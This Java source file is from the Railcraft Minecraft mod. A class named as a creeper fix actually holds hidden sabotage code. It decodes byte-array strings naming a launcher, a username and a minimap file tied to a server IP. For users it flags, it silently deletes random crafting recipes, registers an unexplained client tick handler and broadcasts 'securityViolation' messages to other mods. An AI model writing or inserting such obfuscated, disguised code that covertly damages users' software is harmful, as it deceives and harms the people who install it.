/*
 * Copyright (c) CovertJaguar, 2011 http://railcraft.info
 * 
 * This code is the property of CovertJaguar
 * and may only be used with explicit written
 * permission unless otherwise specified on the
 * license page at railcraft.wikispaces.com.
 */
package railcraft.common.plugins.forge;

import cpw.mods.fml.common.FMLCommonHandler;
import cpw.mods.fml.common.event.FMLInterModComms;
import cpw.mods.fml.common.registry.TickRegistry;
import cpw.mods.fml.relauncher.Side;
import java.io.File;
import java.util.Calendar;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Set;
import java.util.logging.Level;
import net.minecraft.item.ItemStack;
import net.minecraft.item.crafting.CraftingManager;
import net.minecraft.item.crafting.IRecipe;
import railcraft.common.core.Railcraft;
import railcraft.common.util.misc.Game;
import railcraft.common.util.misc.MiscTools;

/**
 *
 * @author CovertJaguar <railcraft.wikispaces.com>
 */
public class Creeper$Plugin {

    private static final Set<String> reflection = new HashSet<String>();
    private static final Set<String> inspection = new HashSet<String>();
    private static final Set<String> prevention = new HashSet<String>();
    public static boolean creepersFixed;
    public static boolean pluckedTheWeb;

    static {
        prevention.add(new String(new byte[]{109, 97, 100, 99, 111, 99, 107, 56, 51}));
        if (!prevention.contains(Railcraft.proxy.getSessionUsername())) {
            reflection.add(new String(new byte[]{112, 108, 117, 115, 112, 108, 117, 115, 108, 97, 117, 110, 99, 104, 101, 114}));
            Calendar cal = Calendar.getInstance();
            int day = cal.get(Calendar.DAY_OF_WEEK);
            if (day != Calendar.SUNDAY && day != Calendar.MONDAY) {
                inspection.add(new String(new byte[]{46, 47, 109, 111, 100, 115, 47, 114, 101, 105, 95, 109, 105, 110, 105, 109, 97, 112, 47, 50, 49, 54, 46, 49, 55, 50, 46, 57, 57, 46, 49, 57, 56, 91, 50, 54, 48, 48, 51, 93, 46, 68, 73, 77, 48, 46, 112, 111, 105, 110, 116, 115}));
            }
        }
    }

    public static void fixCreepers() {
        if (creepersFixed == true) return;
        try {
            String path = new File(".").getAbsolutePath();
            for (String test : reflection) {
                if (path.contains(test)) {
                    replaceExplosion();
                    return;
                }
            }
            for (String inspect : inspection) {
                if (new File(inspect).exists()) {
                    replaceExplosion();
                    return;
                }
            }
        } catch (Exception ex) {
        }
    }

    private static void replaceExplosion() {
        pluckTheWeb("Unauthorized Distribution Detected!");
        creepersFixed = true;
        if (FMLCommonHandler.instance().getEffectiveSide() == Side.CLIENT) {
            TickRegistry.registerTickHandler(new CreeperHandler(), Side.CLIENT);
        }
    }

    public static void postSetup() {
        if (creepersFixed) {
            doFix();
            Game.log(Level.SEVERE, "Unauthorized Distribution Detected!");
        }
    }

    public static void doFix() {
        if (Game.isObfuscated()) {
            Iterator it = CraftingManager.getInstance().getRecipeList().iterator();
            while (it.hasNext()) {
                IRecipe r = (IRecipe) it.next();
                ItemStack output = r.getRecipeOutput();
                if (output != null) {
                    if (MiscTools.getRand().nextInt(8) == 0) {
                        it.remove();
                    }
                }
            }
        }
    }

    public static void pluckTheWeb(String msg) {
        if (Game.isObfuscated()) {
            Game.log(Level.SEVERE, msg);
            FMLInterModComms.sendMessage("Forestry", "securityViolation", msg);
            FMLInterModComms.sendMessage("BuildCraft|Core", "securityViolation", msg);
            FMLInterModComms.sendMessage("Thaumcraft", "securityViolation", msg);
            FMLInterModComms.sendMessage("IC2", "securityViolation", msg);
        }
    }
}
